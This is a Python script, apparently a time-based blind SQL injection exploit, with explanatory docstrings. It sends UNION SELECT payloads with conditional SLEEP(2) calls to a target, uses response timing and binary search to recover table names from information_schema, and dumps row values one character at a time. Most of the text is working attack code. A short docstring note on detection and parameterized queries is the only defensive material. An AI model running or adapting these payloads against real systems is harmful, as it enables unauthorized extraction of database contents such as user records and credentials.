def evaluate_delay():
    """Calibrate the timing baseline used by every later oracle check.

    Sends the fixed SLEEP(2) probe three times through ``check`` and stores
    the mean of the returned values in the module-global ``DELTA``. Every
    other function in this file decides whether its injected CASE expression
    took the SLEEP branch by comparing ``check(payload)`` against
    ``DELTA*TRESHOLD`` (``TRESHOLD`` is defined outside this view).
    ``check`` is also defined elsewhere; it is assumed to return a number,
    presumably the measured response time — confirm against its definition.

    Detection note: the probe pattern is many near-identical requests whose
    latency alternates between roughly zero and >= 2 s, with SLEEP/CASE
    visible in the query text; that is what a slow-query log or WAF rule
    surfaces. Parameterized queries at the injection point remove the
    condition the probes depend on.
    """
    global DELTA
    deltas = []
    # Unconditional SLEEP: measures the delay the server adds when the
    # condition holds, so later conditional probes have a reference value.
    payload = "' UNION SELECT SLEEP(2)-- - '"
    for _ in range(3):
        deltas.append(check(payload))
    # Mean of the three samples; no outlier handling, so one slow network
    # round-trip skews the baseline for the rest of the run.
    DELTA = sum(deltas)/len(deltas)
def get_tbl_name_len():
    """Return the length of the first table name matching the global ``LIKE``.

    Counts ``i`` upward from 0; the probe sleeps once ``LENGTH(table_name)``
    is strictly less than ``i``, so the first sleeping ``i`` is one past the
    real length and ``i-1`` is returned. If ``i`` passes 100 without a hit
    the script prints a failure message and exits with -1 (the bound check
    runs after the oracle check, so 101 probes are sent at most).

    Uses module globals ``LIKE``, ``DELTA`` and ``TRESHOLD`` and the
    ``check`` helper, all defined outside this block. ``LIKE`` is
    interpolated into the SQL text verbatim.
    """
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
        # Timing oracle: a response slower than the calibrated baseline
        # means the SLEEP branch ran, i.e. the condition was true.
        if check(payload) >= DELTA*TRESHOLD:
            return i-1
        # Upper bound on the linear scan; note this is an f-string with no
        # placeholders, kept as written.
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1
def get_tbl_name(length):
    """Recover a table name of ``length`` characters, one character at a time.

    For each 1-based position ``i`` (SUBSTR is 1-based) a binary search over
    ASCII codes 0..126 is run: the probe sleeps when the character's code is
    ``<= mid``, so a slow response moves the upper bound down, otherwise the
    lower bound moves up. When the bounds meet, ``min`` is the code and is
    appended to the result. Characters above 126 cannot be recovered.

    Args:
        length: number of characters to recover (from ``get_tbl_name_len``).

    Returns:
        The recovered name as a string.

    Style: ``min``/``max`` shadow the builtins; ``lo``/``hi`` would avoid
    that. Uses globals ``LIKE``, ``DELTA``, ``TRESHOLD``, ``DEBUG`` and the
    ``check`` helper from outside this block.
    """
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE '{LIKE}' )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
            if check(payload) >= DELTA*TRESHOLD:
                # Slow => code <= mid: narrow the upper bound.
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
        if DEBUG:
            print(f"[DEBUG] Table name: {tbl_name}")
    return tbl_name
def get_rows_number(tbl_name):
    """Return the number of rows in ``tbl_name`` as seen by ``COUNT(user_name)``.

    Counts ``i`` upward; here the branches are inverted relative to the other
    probes — the query sleeps when the count is NOT greater than ``i`` — so
    the first slow response means ``count == i`` and ``i`` is returned
    directly. ``user_name`` is hard-coded, so the count only covers rows with
    a non-NULL value in that column, and the function never terminates if
    that column does not exist or the oracle never fires (there is no upper
    bound like the one in ``get_tbl_name_len``).

    Args:
        tbl_name: table name spliced verbatim into the SQL text.

    Returns:
        The first ``i`` for which the probe was slow.
    """
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT COUNT(user_name) FROM {tbl_name})>{i} THEN 0 ELSE SLEEP(2) END) -- - '"
        if check(payload) >= DELTA*TRESHOLD:
            return i
        i += 1
def get_elt_len(tbl_name, column_name, offset):
    """Return the length of ``column_name`` in the row at ``offset`` of ``tbl_name``.

    Same linear scan as ``get_tbl_name_len``: the probe sleeps once the
    value's ``LENGTH`` is strictly less than ``i``, so ``i-1`` is returned on
    the first slow response. Unlike ``get_tbl_name_len`` there is no upper
    bound, so the loop never ends if the oracle never fires (e.g. a NULL
    value, for which ``LENGTH`` is NULL and the comparison is never true).

    Args:
        tbl_name: table name spliced verbatim into the SQL text.
        column_name: column name spliced verbatim into the SQL text.
        offset: 0-based row index used with ``LIMIT 1 OFFSET``.

    Returns:
        The recovered length.
    """
    i = 0
    while 1:
        payload = f"' UNION SELECT (CASE WHEN (SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1 OFFSET {offset})<{i} THEN SLEEP(2) ELSE 0 END) -- - '"
        if check(payload) >= DELTA*TRESHOLD:
            if DEBUG:
                print(
                    f"[DEBUG] Element {offset} in {column_name} from {tbl_name} length: {i-1}")
            return i-1
        i += 1
def get_elt(tbl_name, column_name, offset, length):
    """Recover the value of ``column_name`` in row ``offset`` of ``tbl_name``.

    Character-by-character binary search identical to ``get_tbl_name``, but
    against an arbitrary table/column and row: for each 1-based position the
    probe sleeps when the ASCII code is ``<= mid``; the bounds converge on
    the code, which is appended via ``chr``. Only codes 0..126 are reachable.

    Args:
        tbl_name: table name spliced verbatim into the SQL text.
        column_name: column name spliced verbatim into the SQL text.
        offset: 0-based row index used with ``LIMIT 1 OFFSET``.
        length: number of characters to recover (from ``get_elt_len``).

    Returns:
        The recovered value as a string; it is also printed.

    Style: ``min``/``max`` shadow the builtins, as in ``get_tbl_name``.
    """
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"' UNION SELECT (CASE WHEN (SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1 OFFSET {offset} )<={mid} THEN SLEEP(2) ELSE 0 END) -- - '"
            if check(payload) >= DELTA*TRESHOLD:
                # Slow => code <= mid: narrow the upper bound.
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
        if DEBUG:
            print(
                f"[DEBUG] Element {offset} in {column_name} from {tbl_name}: {elt}")
    print(f"[*] Element {offset} in {column_name} from {tbl_name}: {elt}")
    return elt
def get_rows(tbl_name, row_number):
    """Print every row of ``tbl_name`` for the columns listed in global ``COLUMNS``.

    For each row offset in ``range(row_number)`` and each column name in
    ``COLUMNS`` (defined outside this block), first recovers the value length
    with ``get_elt_len`` and then the value itself with ``get_elt``. Each row
    is printed as it completes and the full list is printed at the end.

    Args:
        tbl_name: table name passed through to the helpers.
        row_number: number of rows to read (from ``get_rows_number``).

    Returns:
        None — the collected ``rows`` list is only printed, never returned,
        so callers cannot use the result programmatically.
    """
    print(f"[*] Trying to dump {tbl_name}")
    rows = []
    for offset in range(row_number):
        row = []
        for column_name in COLUMNS:
            elt_length = get_elt_len(tbl_name, column_name, offset)
            row.append(get_elt(tbl_name, column_name, offset, elt_length))
        print(f"[*] Row {offset}: {row}")
        rows.append(row)
    print(f"[*] Rows: {rows}")
def main():
if len(sys.argv) < 2:
print(usage())
exit(-1)
if DEBUG:
print(f"[*] Target: {sys.argv[1]}")
if DEBUG:
print(f"[DEBUG] Writting generator to {GENERATOR_NAME}")
generator("w")
evaluate_delay()
if DEBUG:
print(f"[*] Delta: {DELTA}")
tbl_name_len = get_tbl_name_len()
if DEBUG:
print(
f"[DEBUG] Looking for table like {LIKE} with length {tbl_name_len}")